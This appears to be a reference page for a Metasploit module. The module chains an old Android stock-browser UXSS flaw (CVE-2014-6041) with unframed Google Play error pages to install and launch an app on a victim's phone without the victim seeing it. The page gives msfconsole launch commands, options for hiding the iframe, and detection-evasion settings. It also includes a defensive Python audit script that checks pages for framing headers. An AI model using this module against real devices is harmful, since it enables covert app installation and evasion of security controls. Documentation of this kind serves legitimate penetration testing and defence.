Android Browser RCE Through Google Play Store XFO - Metasploit


This page contains detailed information about how to use the auxiliary/admin/android/google_play_store_uxss_xframe_rce metasploit module. For a list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Android Browser RCE Through Google Play Store XFO
Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
Source code: modules/auxiliary/admin/android/google_play_store_uxss_xframe_rce.rb
Disclosure date: -
Last modification time: 2020-05-12 22:15:21 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2014-6041

This module combines two vulnerabilities to achieve remote code execution on affected Android devices. First, the module exploits CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability present in versions of Android's open source stock browser (the AOSP Browser) prior to 4.4. Second, the Google Play store's web interface fails to enforce an X-Frame-Options: DENY header (XFO) on some error pages, and therefore can be targeted for script injection. As a result, this leads to remote code execution through Google Play's remote installation feature, as any application available on the Google Play store can be installed and launched on the user's device. This module requires that the user is logged into Google with a vulnerable browser. To list the activities in an APK, you can use aapt dump badging /path/to/app.apk.
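The framing gap the description above relies on is something a site owner can audit from the defender's side. The following Python is added here as an example; it is not code from the Metasploit module or from this page. It parses a set of raw HTTP responses (constructed samples, not captured Google Play traffic) and reports which pages lack a framing defence, meaning neither X-Frame-Options: DENY/SAMEORIGIN nor a Content-Security-Policy frame-ancestors directive. Error pages that come back unprotected are exactly the class of response the module targets, so the audit deliberately includes 404 and 500 responses alongside normal pages.

```python
"""Audit HTTP responses for framing protection (X-Frame-Options / CSP frame-ancestors).

Added example, not part of the Metasploit module or this page's own code.
It models the gap the module relies on: a site that sends X-Frame-Options on
its main pages but forgets it on error pages. All responses below are
constructed samples, not captured Google Play traffic.
"""
from dataclasses import dataclass

# Constructed sample responses: status line plus headers, bodies omitted.
SAMPLE_RESPONSES = {
    "/store/apps": (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "X-Frame-Options: DENY\r\n"
        "\r\n"
    ),
    "/store/apps/does-not-exist": (          # error page with no XFO at all
        "HTTP/1.1 404 Not Found\r\n"
        "Content-Type: text/html; charset=utf-8\r\n"
        "\r\n"
    ),
    "/store/account": (                      # protected via CSP instead of XFO
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html\r\n"
        "Content-Security-Policy: default-src 'self'; frame-ancestors 'none'\r\n"
        "\r\n"
    ),
    "/store/error": (                        # header present but permissive
        "HTTP/1.1 500 Internal Server Error\r\n"
        "Content-Type: text/html\r\n"
        "X-Frame-Options: ALLOWALL\r\n"
        "\r\n"
    ),
}


@dataclass
class Finding:
    path: str
    status: int
    protected: bool
    reason: str


def parse_response(raw: str):
    """Split a raw HTTP response head into (status code, {lowercased name: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    status = int(lines[0].split(" ", 2)[1])
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return status, headers


def framing_protection(headers: dict):
    """Return (protected, reason) for one response's header map.

    A page counts as protected when CSP carries a frame-ancestors directive
    that does not allow any origin, or when X-Frame-Options is DENY or
    SAMEORIGIN. Any other value (e.g. ALLOWALL) or no header at all means
    an attacker-controlled page can frame it.
    """
    csp = headers.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.lower() for s in parts[1:]]
            if "*" in sources:
                return False, "CSP frame-ancestors allows any origin"
            return True, f"CSP frame-ancestors {' '.join(parts[1:])}"
    xfo = headers.get("x-frame-options", "").strip().upper()
    if xfo in ("DENY", "SAMEORIGIN"):
        return True, f"X-Frame-Options: {xfo}"
    if xfo:
        return False, f"X-Frame-Options value '{xfo}' does not block framing"
    return False, "no X-Frame-Options or CSP frame-ancestors header"


def audit(responses: dict) -> list:
    """Evaluate every (path, raw response) pair and return Finding records."""
    findings = []
    for path, raw in responses.items():
        status, headers = parse_response(raw)
        protected, reason = framing_protection(headers)
        findings.append(Finding(path, status, protected, reason))
    return findings


def unprotected_paths(responses: dict) -> list:
    """Sorted list of paths that can be framed by a third-party page."""
    return sorted(f.path for f in audit(responses) if not f.protected)


if __name__ == "__main__":
    for f in audit(SAMPLE_RESPONSES):
        print(f"{'OK  ' if f.protected else 'FAIL'} {f.status} {f.path}: {f.reason}")
```

Run against the samples, the 404 and 500 responses are flagged while the two 200 pages pass, which is the pattern the module description attributes to the Play store error pages. To audit a real site, feed it responses for both valid and deliberately invalid paths, since the header is often set by application code that never runs for errors raised earlier in the stack; setting both headers at the web server or reverse proxy level, for every status code, closes that gap.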

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/android/google_play_store_uxss_xframe_rce
msf auxiliary(google_play_store_uxss_xframe_rce) > exploit


Msfconsole Usage


Here is how the admin/android/google_play_store_uxss_xframe_rce auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/android/google_play_store_uxss_xframe_rce

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show info

       Name: Android Browser RCE Through Google Play Store XFO
     Module: auxiliary/admin/android/google_play_store_uxss_xframe_rce
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Rafay Baloch
  joev <[email protected]>

Available actions:
  Name       Description
  ----       -----------
  WebServer  Serve exploit via web server

Check supported:
  No

Basic options:
  Name           Current Setting                Required  Description
  ----           ---------------                --------  -----------
  ACTIVITY_NAME  com.swlkr.rickrolld/.RickRoll  yes       The name of the activity in the apk to launch
  DETECT_LOGIN   true                           yes       Prevents the exploit from running if the user is not logged into Google
  HIDE_IFRAME    true                           yes       Hide the exploit iframe from the user
  PACKAGE_NAME   com.swlkr.rickrolld            yes       The package name of the app on the Google Play store you want to install
  SRVHOST        0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT        8080                           yes       The local port to listen on.
  SSL            false                          no        Negotiate SSL for incoming connections
  SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                                       no        The URI to use for this exploit (default is random)

Description:
  This module combines two vulnerabilities to achieve remote code 
  execution on affected Android devices. First, the module exploits 
  CVE-2014-6041, a Universal Cross-Site Scripting (UXSS) vulnerability 
  present in versions of Android's open source stock browser (the AOSP 
  Browser) prior to 4.4. Second, the Google Play store's web interface 
  fails to enforce a X-Frame-Options: DENY header (XFO) on some error 
  pages, and therefore, can be targeted for script injection. As a 
  result, this leads to remote code execution through Google Play's 
  remote installation feature, as any application available on the 
  Google Play store can be installed and launched on the user's 
  device. This module requires that the user is logged into Google 
  with a vulnerable browser. To list the activities in an APK, you can 
  use `aapt dump badging /path/to/app.apk`.

References:
  https://blog.rapid7.com/2014/09/15/major-android-bug-is-a-privacy-disaster-cve-2014-6041
  http://1337day.com/exploit/description/22581
  OSVDB (110664)
  https://nvd.nist.gov/vuln/detail/CVE-2014-6041

Module Options


This is a complete list of options available in the admin/android/google_play_store_uxss_xframe_rce auxiliary module:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show options

Module options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):

   Name           Current Setting                Required  Description
   ----           ---------------                --------  -----------
   ACTIVITY_NAME  com.swlkr.rickrolld/.RickRoll  yes       The name of the activity in the apk to launch
   DETECT_LOGIN   true                           yes       Prevents the exploit from running if the user is not logged into Google
   HIDE_IFRAME    true                           yes       Hide the exploit iframe from the user
   PACKAGE_NAME   com.swlkr.rickrolld            yes       The package name of the app on the Google Play store you want to install
   SRVHOST        0.0.0.0                        yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT        8080                           yes       The local port to listen on.
   SSL            false                          no        Negotiate SSL for incoming connections
   SSLCert                                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                                       no        The URI to use for this exploit (default is random)

Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Advanced Options


Here is a complete list of advanced options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show advanced

Module advanced options (auxiliary/admin/android/google_play_store_uxss_xframe_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   ListenerComm                     no        The specific communication channel to use for this service
   SSLCipher                        no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression  false            no        Enable SSL/TLS-level compression
   SendRobots      false            no        Return a robots.txt file if asked for one
   URIHOST                          no        Host to use in URI (useful for tunnels)
   URIPORT                          no        Port to use in URI (useful for tunnels)
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/android/google_play_store_uxss_xframe_rce module can do:

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show actions

Auxiliary actions:

   Name       Description
   ----       -----------
   WebServer  Serve exploit via web server

Evasion Options


Here is the full list of possible evasion options supported by the admin/android/google_play_store_uxss_xframe_rce auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/android/google_play_store_uxss_xframe_rce) > show evasion

Module evasion options:

   Name                      Current Setting  Required  Description
   ----                      ---------------  --------  -----------
   HTML::base64              none             no        Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
   HTML::javascript::escape  0                no        Enable HTML obfuscation via HTML escaping (number of iterations)
   HTML::unicode             none             no        Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
   HTTP::chunked             false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression         none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding      false            no        Enable folding of HTTP headers
   HTTP::junk_headers        false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache            false            no        Disallow the browser to cache HTTP content
   HTTP::server_name         Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size        0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay           0                no        Delays inserted before every send.  (0 = disable)


Authors


  • Rafay Baloch
  • joev

Version


This page has been produced using Metasploit Framework version 6.1.28-dev. For more modules, visit the Metasploit Module Library.
